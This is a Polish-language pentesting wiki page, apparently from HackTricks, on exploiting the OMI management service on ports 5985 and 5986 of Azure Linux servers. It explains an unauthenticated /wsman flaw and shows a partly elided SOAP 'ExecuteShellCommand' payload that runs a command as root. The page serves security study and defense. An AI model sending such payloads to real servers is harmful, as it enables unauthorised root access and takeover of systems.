5985,5986 - Pentesting OMI

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Podstawowe informacje

OMI jest przedstawiane jako open-source narzędzie stworzone przez Microsoft, zaprojektowane do zdalnego zarządzania konfiguracją. Jest szczególnie istotne dla serwerów Linux na Azure, które wykorzystują usługi takie jak:

  • Azure Automation

  • Azure Automatic Update

  • Azure Operations Management Suite

  • Azure Log Analytics

  • Azure Configuration Management

  • Azure Diagnostics

Proces omiengine jest inicjowany i nasłuchuje na wszystkich interfejsach jako root, gdy te usługi są aktywowane.

Domyślne porty używane to 5985 (http) i 5986 (https).

Jak zaobserwowano 16 września, serwery Linux wdrożone w Azure z wymienionymi usługami są podatne z powodu wrażliwej wersji OMI. Ta podatność leży w obsłudze wiadomości przez serwer OMI poprzez punkt końcowy /wsman bez wymagania nagłówka uwierzytelnienia, co błędnie autoryzuje klienta.

Atakujący może to wykorzystać, wysyłając ładunek SOAP "ExecuteShellCommand" bez nagłówka uwierzytelnienia, zmuszając serwer do wykonywania poleceń z uprawnieniami roota.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Aby uzyskać więcej informacji na temat tego CVE sprawdź to.

Odniesienia

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Last updated